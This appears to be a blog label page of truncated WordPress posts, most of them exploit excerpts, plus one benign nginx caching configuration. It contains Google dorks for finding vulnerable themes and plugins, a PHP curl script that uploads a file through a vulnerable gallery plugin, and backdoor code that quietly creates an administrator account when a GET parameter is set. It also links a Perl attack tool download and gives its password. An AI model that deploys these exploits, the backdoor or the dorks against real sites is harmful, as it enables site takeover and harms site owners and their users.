################################################## #################################################
# Exploit Title: WordPress Curvo Themes CSRF File Upload Vulnerability
# Author: Byakuya
# Date: 10/26/2013
# Vendor Homepage: http://themeforest.net/
# Themes Link: http://www.wphub.com/themes/curvo-by-themeforest/
# Infected File: upload_handler.php
# Google dork: inurl:/wp-content/themes/curvo/
##################################################...
Showing posts with the label WordPress. Show all posts
Wordpress WP Realty Plugin - Blind SQL Injection
# Exploit Title: Wordpress - wp-realty - MySQL Time Based Injection
# Google Dork: inurl:"/wp-content/plugins/wp-realty/"
#...
Wordpress Plugin Complete Gallery Manager 3.3.3 - Arbitrary File Upload Vulnerability
Exploit :
Code:
<?php
$uploadfile="up.php";
$ch = curl_init("http://wordpress.localhost:8080/wordpress/wp-content/plugins/complete-gallery-manager/frames/upload-images.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print...
Configuring WordPress + WP Super Cache + Cloudflare on nginx
Open the domain's vhost file and you will see the following section
Code:
index index.php index.html index.htm;
server_name abc.com;
location / {
try_files $uri $uri/ /index.php?$args;
}
Change it to the following
Code:
index index.php index.html index.htm;
server_name abc.com cdn.abc.com;
set $cache_uri...
WordPress plugin W3 Total Cache critical Vulnerability disclosed

One of the most popular WordPress plugins, "W3 Total Cache",
which is used to improve site performance and user experience via
caching, has a potential vulnerability. On Christmas Day, someone
disclosed on the Full Disclosure site how a plugin misconfiguration
leads to a possible WordPress CMS hack.
The...
Perl Attack Tools
I will introduce the features of the menu options later. Here is a demo of it!
***I hope the tool will be supported and developed in Vietnam. If you copy it, please respect the author's copyright.
Thanks to -->Persia Security Group<--
links: http://www.mediafire.com/?nq8o41fyfqtisah
pass: talentkong@ceh.vn
...
Cross-site Scripting Vulnerability in WordPress GD Star Rating Plugin
Vector: Remote
Severity: Low
Patch: Unpatched
Impact: Cross-site Scripting (XSS)
Software: WordPress GD Star Rating Plugin 1.x, vulnerable versions: <=1.9.7
A cross-site scripting (XSS) vulnerability has been discovered in WordPress GD Star Rating Plugin.
An input validation error exists in
wp-content/plugins/gd-star-rating/widgets/widget_top.php...
WordPress Admin Access Backdoor
<?php
add_action('wp_head', 'my_backdoor');
function my_backdoor() {
If ($_GET['backdoor'] == 'go') {
require('wp-includes/registration.php');
If (!username_exists('private')) {
$user_id = wp_create_user('private', '12345678');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
?>...
WordPress Blog Exploit
search google: inurl:"fbconnect_action=myhome"
replace
?fbconnect_action=myhome&userid...